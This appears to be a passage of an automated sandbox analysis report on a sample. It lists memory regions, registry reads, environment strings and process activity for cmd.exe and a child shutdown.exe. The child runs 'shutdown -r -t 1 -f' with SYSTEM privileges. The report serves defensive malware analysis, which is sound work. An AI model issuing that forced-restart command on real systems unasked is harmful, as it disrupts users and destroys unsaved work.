private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	Readable, Writable	-
private_0x0000000000190000	0x00190000	0x0019ffff	Private Memory	Readable, Writable	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	Readable, Writable	-
pagefile_0x00000000002f0000	0x002f0000	0x00477fff	Pagefile Backed Memory	Readable	-
private_0x00000000004b0000	0x004b0000	0x0052ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000530000	0x00530000	0x006b0fff	Pagefile Backed Memory	Readable	-
private_0x00000000006f0000	0x006f0000	0x007effff	Private Memory	Readable, Writable	-
pagefile_0x00000000007f0000	0x007f0000	0x01beffff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000001bf0000	0x01bf0000	0x01f32fff	Pagefile Backed Memory	Readable	-
sortdefault.nls	0x01f40000	0x0220efff	Memory Mapped File	Readable	-
cmd.exe	0x4a1a0000	0x4a1ebfff	Memory Mapped File	Readable, Writable, Executable	-
winbrand.dll	0x718a0000	0x718a6fff	Memory Mapped File	Readable, Writable, Executable	-
wow64cpu.dll	0x756d0000	0x756d7fff	Memory Mapped File	Readable, Writable, Executable	-
wow64win.dll	0x756e0000	0x7573bfff	Memory Mapped File	Readable, Writable, Executable	-
wow64.dll	0x75740000	0x7577efff	Memory Mapped File	Readable, Writable, Executable	-
cryptbase.dll	0x75980000	0x7598bfff	Memory Mapped File	Readable, Writable, Executable	-
sspicli.dll	0x75990000	0x759effff	Memory Mapped File	Readable, Writable, Executable	-
sechost.dll	0x75a30000	0x75a48fff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x75bb0000	0x75bf5fff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x75fd0000	0x760dffff	Memory Mapped File	Readable, Writable, Executable	-
advapi32.dll	0x760e0000	0x7617ffff	Memory Mapped File	Readable, Writable, Executable	-
lpk.dll	0x763c0000	0x763c9fff	Memory Mapped File	Readable, Writable, Executable	-
user32.dll	0x763e0000	0x764dffff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x76670000	0x7671bfff	Memory Mapped File	Readable, Writable, Executable	-
msctf.dll	0x76720000	0x767ebfff	Memory Mapped File	Readable, Writable, Executable	-
imm32.dll	0x77570000	0x775cffff	Memory Mapped File	Readable, Writable, Executable	-
rpcrt4.dll	0x775d0000	0x776bffff	Memory Mapped File	Readable, Writable, Executable	-
gdi32.dll	0x77820000	0x778affff	Memory Mapped File	Readable, Writable, Executable	-
usp10.dll	0x77990000	0x77a2cfff	Memory Mapped File	Readable, Writable, Executable	-
private_0x0000000077a30000	0x77a30000	0x77b4efff	Private Memory	Readable, Writable, Executable	-
private_0x0000000077b50000	0x77b50000	0x77c49fff	Private Memory	Readable, Writable, Executable	-
ntdll.dll	0x77c50000	0x77df8fff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x77e30000	0x77faffff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	-

Host Behavior

File (10)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\5P5NRG~1\AppData\Local\Temp	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	5	Fn
Open	STD_INPUT_HANDLE	-	3	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\system32\shutdown.exe	os_pid = 0xbb8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn
Get Info	c:\windows\syswow64\cmd.exe	type = PROCESS_DEVICE_MAP		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0x4a1a0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75fd0000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ffa84f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x76003b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75fe4a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x75ffa79d	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-04-24 10:31:25 (UTC)		1	Fn
Get Time	type = Ticks, time = 134784		1	Fn

Environment (17)

Operation	Additional Information	Count	Logfile
Get Environment String	-	6	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = =C:, value = C:\Users\5P5NRG~1\AppData\Local\Temp	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #11: shutdown.exe

Information	Value
ID	#11
File Name	c:\windows\syswow64\shutdown.exe
Command Line	shutdown -r -t 1 -f
Initial Working Directory	C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor	Start Time: 00:01:12, Reason: Child Process
Unmonitor	End Time: 00:10:27, Reason: Terminated by Timeout
Monitor Duration	00:09:15
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xbb8
Parent PID	0xb90 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x BBC 0x BEC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	-
private_0x0000000000090000	0x00090000	0x000cffff	Private Memory	Readable, Writable	-
private_0x00000000000d0000	0x000d0000	0x0010ffff	Private Memory	Readable, Writable	-
private_0x0000000000130000	0x00130000	0x001affff	Private Memory	Readable, Writable	-
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	Readable, Writable	-
locale.nls	0x002d0000	0x00336fff	Memory Mapped File	Readable	-
pagefile_0x0000000000340000	0x00340000	0x004c7fff	Pagefile Backed Memory	Readable	-
private_0x00000000004e0000	0x004e0000	0x004effff	Private Memory	Readable, Writable	-
shutdown.exe	0x00720000	0x00729fff	Memory Mapped File	Readable, Writable, Executable	-
secur32.dll	0x74610000	0x74617fff	Memory Mapped File	Readable, Writable, Executable	-
wow64cpu.dll	0x756d0000	0x756d7fff	Memory Mapped File	Readable, Writable, Executable	-
wow64win.dll	0x756e0000	0x7573bfff	Memory Mapped File	Readable, Writable, Executable	-
wow64.dll	0x75740000	0x7577efff	Memory Mapped File	Readable, Writable, Executable	-
cryptbase.dll	0x75980000	0x7598bfff	Memory Mapped File	Readable, Writable, Executable	-
sspicli.dll	0x75990000	0x759effff	Memory Mapped File	Readable, Writable, Executable	-
sechost.dll	0x75a30000	0x75a48fff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x75bb0000	0x75bf5fff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x75fd0000	0x760dffff	Memory Mapped File	Readable, Writable, Executable	-
advapi32.dll	0x760e0000	0x7617ffff	Memory Mapped File	Readable, Writable, Executable	-
lpk.dll	0x763c0000	0x763c9fff	Memory Mapped File	Readable, Writable, Executable	-
user32.dll	0x763e0000	0x764dffff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x76670000	0x7671bfff	Memory Mapped File	Readable, Writable, Executable	-
msctf.dll	0x76720000	0x767ebfff	Memory Mapped File	Readable, Writable, Executable	-
imm32.dll	0x77570000	0x775cffff	Memory Mapped File	Readable, Writable, Executable	-
rpcrt4.dll	0x775d0000	0x776bffff	Memory Mapped File	Readable, Writable, Executable	-
ole32.dll	0x776c0000	0x7781bfff	Memory Mapped File	Readable, Writable, Executable	-
gdi32.dll	0x77820000	0x778affff	Memory Mapped File	Readable, Writable, Executable	-
usp10.dll	0x77990000	0x77a2cfff	Memory Mapped File	Readable, Writable, Executable	-
private_0x0000000077a30000	0x77a30000	0x77b4efff	Private Memory	Readable, Writable, Executable	-
private_0x0000000077b50000	0x77b50000	0x77c49fff	Private Memory	Readable, Writable, Executable	-
ntdll.dll	0x77c50000	0x77df8fff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x77e30000	0x77faffff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	-

Notifications (2/3)

Monitored Processes

Behavior Information - Grouped by Category

Before

After